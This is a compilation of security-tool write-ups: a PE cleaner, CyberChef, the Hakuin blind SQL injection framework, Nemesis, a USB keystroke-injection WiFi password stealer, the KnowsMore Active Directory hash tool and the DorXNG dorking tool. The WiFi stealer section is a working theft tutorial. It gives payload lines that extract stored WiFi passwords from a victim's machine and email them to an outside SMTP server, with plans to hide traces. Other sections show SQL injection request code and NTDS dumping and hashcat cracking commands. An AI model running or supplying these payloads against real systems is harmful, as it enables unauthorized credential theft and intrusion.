
File-Unpumper - Tool That Can Be Used To Trim Useless Things From A PE File Such As The Things A File Pumper Would Add

By: Zion3R


file-unpumper is a powerful command-line utility designed to clean and analyze Portable Executable (PE) files. It provides a range of features to help developers and security professionals work with PE files more effectively.


Features

  • PE Header Fixing: file-unpumper can fix and align the PE headers of a given executable file. This is particularly useful for resolving issues caused by packers or obfuscators that modify the headers.

  • Resource Extraction: The tool can extract embedded resources from a PE file, such as icons, bitmaps, or other data resources. This can be helpful for reverse engineering or analyzing the contents of an executable.

  • Metadata Analysis: file-unpumper provides a comprehensive analysis of the PE file's metadata, including the machine architecture, number of sections, timestamp, subsystem, image base, and section details (a rough illustration of reading these same fields follows this list).

  • File Cleaning: The core functionality of file-unpumper is to remove any "pumped" or padded data from a PE file, resulting in a cleaned version of the executable. This can aid in malware analysis, reverse engineering, or simply reducing the file size.

  • Parallel Processing: To ensure efficient performance, file-unpumper leverages the power of parallel processing using the rayon crate, allowing it to handle large files with ease.

  • Progress Tracking: During the file cleaning process, a progress bar is displayed, providing a visual indication of the operation's progress and estimated time remaining.
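The same header fields can also be inspected by hand. The short Python sketch below uses the pefile library purely as an illustration of the metadata listed above; it is not part of file-unpumper, which is written in Rust and parses these structures itself:

import pefile

# Illustration only: print the fields described under "Metadata Analysis".
pe = pefile.PE("path/to/input.exe")
print("Machine:", hex(pe.FILE_HEADER.Machine))
print("Sections:", pe.FILE_HEADER.NumberOfSections)
print("Timestamp:", pe.FILE_HEADER.TimeDateStamp)
print("Subsystem:", pe.OPTIONAL_HEADER.Subsystem)
print("Image base:", hex(pe.OPTIONAL_HEADER.ImageBase))
for section in pe.sections:
    print(section.Name.rstrip(b"\x00").decode(), hex(section.VirtualAddress), section.SizeOfRawData)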

Installation

file-unpumper is written in Rust and can be easily installed using the Cargo package manager:

cargo install file-unpumper

Usage

file-unpumper [OPTIONS] <INPUT>

  • <INPUT>: The path to the input PE file.

Options

  • --fix-headers: Fix and align the PE headers of the input file.
  • --extract-resources: Extract embedded resources from the input file.
  • --analyze-metadata: Analyze and display the PE file's metadata.
  • -h, --help: Print help information.
  • -V, --version: Print version information.

Examples

  1. Clean a PE file and remove any "pumped" data:

file-unpumper path/to/input.exe

  2. Fix the PE headers and analyze the metadata of a file:

file-unpumper --fix-headers --analyze-metadata path/to/input.exe

  3. Extract resources from a PE file:

file-unpumper --extract-resources path/to/input.exe

  4. Perform all available operations on a file:

file-unpumper --fix-headers --extract-resources --analyze-metadata path/to/input.exe

Contributing

Contributions to file-unpumper are welcome! If you encounter any issues or have suggestions for improvements, please open an issue or submit a pull request on the GitHub repository.

Changelog

The latest changelogs can be found in CHANGELOG.md

License

file-unpumper is released under the MIT License.



CyberChef - The Cyber Swiss Army Knife - A Web App For Encryption, Encoding, Compression And Data Analysis

By: Zion3R


CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR and Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years.


Live demo

CyberChef is still under active development. As a result, it shouldn't be considered a finished product. There is still testing and bug fixing to do, new features to be added and additional documentation to write. Please contribute!

Cryptographic operations in CyberChef should not be relied upon to provide security in any situation. No guarantee is offered for their correctness.

A live demo can be found here - have fun!

Containers

If you would like to try out CyberChef locally you can either build it yourself:

docker build --tag cyberchef --ulimit nofile=10000 .
docker run -it -p 8080:80 cyberchef

Or you can use our image directly:

docker run -it -p 8080:80 ghcr.io/gchq/cyberchef:latest

This image is built and published through our GitHub Workflows

How it works

There are four main areas in CyberChef:

  1. The input box in the top right, where you can paste, type or drag the text or file you want to operate on.
  2. The output box in the bottom right, where the outcome of your processing will be displayed.
  3. The operations list on the far left, where you can find all the operations that CyberChef is capable of in categorised lists, or by searching.
  4. The recipe area in the middle, where you can drag the operations that you want to use and specify arguments and options.

You can use as many operations as you like, in simple or complex ways.

Features

  • Drag and drop
    • Operations can be dragged in and out of the recipe list, or reorganised.
    • Files up to 2GB can be dragged over the input box to load them directly into the browser.
  • Auto Bake
    • Whenever you modify the input or the recipe, CyberChef will automatically "bake" for you and produce the output immediately.
    • This can be turned off and operated manually if it is affecting performance (if the input is very large, for instance).
  • Automated encoding detection
    • CyberChef uses a number of techniques to attempt to automatically detect which encoding your data is in. If it finds a suitable operation that makes sense of your data, it displays the 'magic' icon in the Output field, which you can click to decode your data.
  • Breakpoints
    • You can set breakpoints on any operation in your recipe to pause execution before running it.
    • You can also step through the recipe one operation at a time to see what the data looks like at each stage.
  • Save and load recipes
    • If you come up with an awesome recipe that you know you'll want to use again, just click "Save recipe" and add it to your local storage. It'll be waiting for you next time you visit CyberChef.
    • You can also copy the URL, which includes your recipe and input, to easily share it with others.
  • Search
    • If you know the name of the operation you want or a word associated with it, start typing it into the search field and any matching operations will immediately be shown.
  • Highlighting
  • Save to file and load from file
    • You can save the output to a file at any time or load a file by dragging and dropping it into the input field. Files up to around 2GB are supported (depending on your browser), however, some operations may take a very long time to run over this much data.
  • CyberChef is entirely client-side
    • It should be noted that none of your recipe configuration or input (either text or files) is ever sent to the CyberChef web server - all processing is carried out within your browser, on your own computer.
    • Due to this feature, CyberChef can be downloaded and run locally. You can use the link in the top left corner of the app to download a full copy of CyberChef and drop it into a virtual machine, share it with other people, or host it in a closed network.

Deep linking

By manipulating CyberChef's URL hash, you can change the initial settings with which the page opens. The format is https://gchq.github.io/CyberChef/#recipe=Operation()&input=...

Supported arguments are recipe, input (encoded in Base64), and theme.
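As a rough illustration only (not an official CyberChef API), the Python sketch below builds such a deep link, assuming the input argument is plain Base64 that is then URL-encoded; the recipe string is just an example:

import base64
import urllib.parse

def cyberchef_link(recipe: str, input_text: str) -> str:
    # Sketch: Base64-encode the input, then URL-encode both arguments.
    encoded = base64.b64encode(input_text.encode()).decode()
    return ("https://gchq.github.io/CyberChef/#recipe=" + urllib.parse.quote(recipe)
            + "&input=" + urllib.parse.quote(encoded))

print(cyberchef_link("To_Hex('Space',0)", "hello world"))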

Browser support

CyberChef is built to support:

  • Google Chrome 50+
  • Mozilla Firefox 38+

Node.js support

CyberChef is built to fully support Node.js v16. For more information, see the "Node API" wiki page

Contributing

Contributing a new operation to CyberChef is super easy! The quickstart script will walk you through the process. If you can write basic JavaScript, you can write a CyberChef operation.

An installation walkthrough, how-to guides for adding new operations and themes, descriptions of the repository structure, available data types and coding conventions can all be found in the "Contributing" wiki page.

  • Push your changes to your fork.
  • Submit a pull request. If you are doing this for the first time, you will be prompted to sign the GCHQ Contributor Licence Agreement via the CLA assistant on the pull request. This will also ask whether you are happy for GCHQ to contact you about a token of thanks for your contribution, or about job opportunities at GCHQ.


Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

By: Zion3R


Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences:

  • BlackHat MEA, Riyadh, 2023
  • Hack in the Box, Phuket, 2023
  • IEEE S&P Workshop on Offensive Technologies (WOOT), 2023

More information can be found in our paper and slides.


Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from Requester and override the request method. The method must inject the provided query and determine whether it resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference

import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
        return r.status == 200

Example 2 - Header Injection with Content-based Inference

class ContentRequester(Requester):
    async def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        r = await aiohttp.get(f'http://vuln.com/', headers=headers)
        return 'found' in await r.text()

To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL

import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
    ...

async def main():
    # requester: Use this Requester
    # dbms: Use this DBMS
    # n_tasks: Spawns N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())

Now that everything is set, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
Example 2 - Extracting Tables
tables = await ext.extract_table_names(strategy='model')
Example 3 - Extracting Columns
columns = await ext.extract_column_names(table='users', strategy='model')
Example 4 - Extracting Tables and Columns Together
metadata = await ext.extract_meta(strategy='model')

Once you know the structure, you can extract the actual content.

Example 1 - Extracting Generic Columns
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns
res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns
res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns
res = await ext.extract_column_blob(table='users', column='id')

More examples can be found in the tests directory.

Using Hakuin from the Command Line

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

python3 hk.py -h

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}


Nemesis - An Offensive Data Enrichment Pipeline

By: Zion3R


Nemesis is an offensive data enrichment pipeline and operator support system.

Nemesis is built on Kubernetes with scale in mind; our goal was to create a centralized data processing platform that ingests data produced during offensive security assessments.

Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.


Setup / Installation

See the setup instructions.

Contributing / Development Environment Setup

See development.md

Further Reading

  • Hacking With Your Nemesis (Aug 9, 2023): https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
  • Challenges In Post-Exploitation Workflows (Aug 2, 2023): https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9
  • On (Structured) Data (Jul 26, 2023): https://posts.specterops.io/on-structured-data-707b7d9876c6

Acknowledgments

Nemesis is built on a large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we've forgotten proper credit anywhere, please let us know or submit a pull request!

We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.


Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted with your SMTP details for the Windows exploit and/or with the Linux password and USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friendly solution, Rubber Ducky does offer things like stealthiness and usage of the latest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses the STRING command to process keystrokes for injection. It accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is into the target machine. The ENTER/SPACE commands simulate presses of the corresponding keyboard keys.

Delays

We use the DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a command line to load. Delay is especially useful at the very beginning, when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs, setup time is very short; in most cases it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, an adversary can package it to avoid detection while sending it over the network, using encryption or compression. The two most common ways of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, the payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit the following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use an SMTP server from another email provider, but you should be mindful of the SMTP server and port number you write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to set up multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. The keyfile plugin uses an .ini-style keyfile format to store network configuration profiles; it supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with a regex to extract the data of interest. For the filtering, a positive lookbehind assertion is used ((?<=keyword)). The positive lookbehind matches at a position right after the keyword without making the keyword itself part of the match, so the regex (?<=keyword).* matches any text that follows the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.
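The lookbehind behaviour itself is easy to check outside the payload; the small Python sketch below (illustrative only, with a made-up keyfile) shows the same (?<=keyword).* patterns in action:

import re

# Hypothetical keyfile content, just to demonstrate the lookbehind patterns.
keyfile = """[wifi]
ssid=HomeNetwork

[wifi-security]
psk=SuperSecret123"""

ssid = re.search(r'(?<=ssid=).*', keyfile).group()   # text after "ssid=" only
psk = re.search(r'(?<=psk=).*', keyfile).group()     # text after "psk=" only
print(ssid, psk)  # HomeNetwork SuperSecret123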

For more information about NetworkManager, here are some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of the Rubber Ducky over the RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees is a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below you can find an example of how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't exactly stealthy; quite the opposite, it's rather bulky, especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)

By: Zion3R


KnowsMore officially supports Python 3.8+.

Main features

  • Import NTLM Hashes from .ntds output txt file (generated by CrackMapExec or secretsdump.py)
  • Import NTLM Hashes from NTDS.dit and SYSTEM
  • Import Cracked NTLM hashes from hashcat output file
  • Import BloodHound ZIP or JSON file
  • BloodHound importer (import JSON to Neo4J without BloodHound UI)
  • Analyse password quality (length, lowercase, uppercase, digits, special and Latin characters)
  • Analyse the similarity of passwords with the company and user names (a rough illustration of the idea follows this list)
  • Search for users, passwords and hashes
  • Export all cracked credentials directly to the BloodHound Neo4j database as 'owned objects'
  • Other amazing features...
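KnowsMore's exact scoring is not documented here, but the similarity idea can be illustrated with Python's standard difflib; this is only an assumption-level sketch, not KnowsMore's actual algorithm:

from difflib import SequenceMatcher

def similarity(password: str, company: str) -> int:
    # Rough percentage similarity between a password and a company name.
    return round(SequenceMatcher(None, password.lower(), company.lower()).ratio() * 100)

print(similarity("Company@2022", "company"))  # 74 - comparable in spirit to the company_similarity column below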

Getting stats

knowsmore --stats

This command will produce several statistics about the passwords, like the output below.

KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore

[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db

[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+

[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+

[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+

Installation

Simple

pip3 install --upgrade knowsmore

Note: If you face problems with dependency versions, check the Virtual ENV file.

Execution Flow

There is no mandatory order for importing data, but to get better correlation we suggest the following execution flow:

  1. Create database file
  2. Import BloodHound files
    1. Domains
    2. GPOs
    3. OUs
    4. Groups
    5. Computers
    6. Users
  3. Import NTDS file
  4. Import cracked hashes

Create database file

All data is stored in a SQLite database.

knowsmore --create-db

Importing BloodHound files

We can import full BloodHound files into KnowsMore, correlate the data, and sync it to the Neo4j BloodHound database. This means you can use KnowsMore alone to import JSON files directly into the Neo4j database instead of using the extremely slow BloodHound user interface.

# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip

# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json

Note: KnowsMore can import both BloodHound ZIP and JSON files, but we recommend using the ZIP file, because KnowsMore will automatically order the files for better data correlation.

Sync data to Neo4j BloodHound database

# Bloodhound ZIP File
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678

Note: The KnowsMore BloodHound importer was inspired by the Fox-IT BloodHound Import implementation. We implemented several changes to save all data in the KnowsMore SQLite database and then do an incremental sync to the Neo4j database. This strategy brings several benefits, such as being at least 10x faster than the original BloodHound user interface.

Importing NTDS file

Option 1

Note: Import hashes and clear-text passwords directly from NTDS.dit and SYSTEM registry

knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM

Option 2

Note: First use secretsdump.py to extract the NTDS hashes with the command below.

secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name

After that import

knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds

Generating a custom wordlist

knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name

Importing cracked hashes

Cracking hashes

First extract all hashes to a txt file

# Extract NTLM hashes to file
knowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"

# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt

In order to crack the hashes, I usually use hashcat with the commands below.

# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"

# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a

Importing hashcat output file

knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt

Note: Change clientCompanyName to the name of your company.

Wipe sensitive data

As passwords and their hashes are extremely sensitive data, there is a module to replace the clear-text passwords and their respective hashes.

Note: This command will keep all generated statistics and imported user data.

knowsmore --wipe

BloodHound Mark as owned

One User

During an assessment you may find (in several ways) a user's password, which you can add to the KnowsMore database:

knowsmore --user-pass --username administrator --password Sec4US@2023

# or adding the company name

knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us

Integrate all credentials cracked to Neo4j Bloodhound database

knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456

For remote connections, make sure that the Neo4j database server is accepting remote connections. Change the line below in the config file /etc/neo4j/neo4j.conf and restart the service.

server.bolt.listen_address=0.0.0.0:7687


DorXNG - Next Generation DorX. Built By Dorks, For Dorks

By: Zion3R


DorXNG is a modern solution for harvesting OSINT data using advanced search engine operators through multiple upstream search providers. On the backend it leverages a purpose built containerized image of SearXNG, a self-hosted, hackable, privacy focused, meta-search engine.

Our SearXNG implementation routes all search queries over the Tor network while refreshing circuits every ten seconds with Tor's MaxCircuitDirtiness configuration directive. We have also disabled all of SearXNG's client side timeout features. These settings allow for evasion of search engine restrictions commonly encountered while issuing many repeated search queries.

The DorXNG client application is written in Python3, and interacts with the SearXNG API to issue search queries concurrently. It can even issue requests across multiple SearXNG instances. The resulting search results are stored in a SQLite3 database.
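For orientation, a single request against a SearXNG instance's JSON API looks roughly like the Python sketch below; DorXNG issues such requests concurrently and stores the results in SQLite. The address matches the Docker default mentioned later, and the availability of format=json depends on the instance's settings - treat this as a sketch, not DorXNG's internal code:

import requests

# One illustrative query against a SearXNG instance.
# verify=False is only here because a local instance may use a self-signed certificate.
resp = requests.get(
    "https://172.17.0.2/search",
    params={"q": "site:example.com intext:example", "format": "json"},
    timeout=60,
    verify=False,
)
for result in resp.json().get("results", []):
    print(result.get("url"), "-", result.get("title"))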


We have enabled every supported upstream search engine that allows advanced search operator queries:

  • Google
  • DuckDuckGo
  • Qwant
  • Bing
  • Brave
  • Startpage
  • Yahoo

For more information about what search engines SearXNG supports See: Configured Engines

Setup

LINUX ONLY ** Sorry Normies **

Install DorXNG

git clone https://github.com/researchanddestroy/dorxng
cd dorxng
pip install -r requirements.txt
./DorXNG.py -h

Download and Run Our Custom SearXNG Docker Container (at least one). Multiple SearXNG instances can be used. Use the --serverlist option with DorXNG. See: server.lst

When starting multiple containers wait at least a few seconds between starting each one.

docker run researchanddestroy/searxng:latest

If you would like to build the container yourself:

git clone https://github.com/researchanddestroy/searxng # The URL must be all lowercase for the build process to complete
cd searxng
DOCKER_BUILDKIT=1 make docker.build
docker images
docker run <image-id>

By default DorXNG has a hard-coded server variable in parse_args.py, which is set to the IP address that Docker will assign to the first container you run on your machine (172.17.0.2). This can be changed or overridden with --server or --serverlist.

Start Issuing Search Queries

./DorXNG.py -q 'search query'

Query the DorXNG Database

./DorXNG.py -D 'regex search string'

Instructions

-h, --help            show this help message and exit
-s SERVER, --server SERVER
DorXNG Server Instance - Example: 'https://172.17.0.2/search'
-S SERVERLIST, --serverlist SERVERLIST
Issue Search Queries Across a List of Servers - Format: Newline Delimited
-q QUERY, --query QUERY
Issue a Search Query - Examples: 'search query' | '!tch search query' | 'site:example.com intext:example'
-Q QUERYLIST, --querylist QUERYLIST
Iterate Through a Search Query List - Format: Newline Delimited
-n NUMBER, --number NUMBER
Define the Number of Page Result Iterations
-c CONCURRENT, --concurrent CONCURRENT
Define the Number of Concurrent Page Requests
-l LIMITDATABASE, --limitdatabase LIMITDATABASE
Set Maximum Database Size Limit - Starts New Database After Exceeded - Example: --limitdatabase 10 (10k Database Entries)
Suggested Maximum Database Size is 50k when doing Deep Recursion
-L LOOP, --loop LOOP Define the Number of Main Function Loop Iterations - Infinite Loop with 0
-d DATABASE, --database DATABASE
Specify SQL Database File - Default: 'dorxng.db'
-D DATABASEQUERY, --databasequery DATABASEQUERY
Issue Database Query - Format: Regex
-m MERGEDATABASE, --mergedatabase MERGEDATABASE
Merge SQL Database File - Example: --mergedatabase database.db
-t TIMEOUT, --timeout TIMEOUT
Specify Timeout Interval Between Requests - Default: 4 Seconds - Disable with 0
-r NONEWRESULTS, --nonewresults NONEWRESULTS
Specify Number of Iterations with No New Results - Default: 4 (3 Attempts) - Disable with 0
-v, --verbose Enable Verbose Output
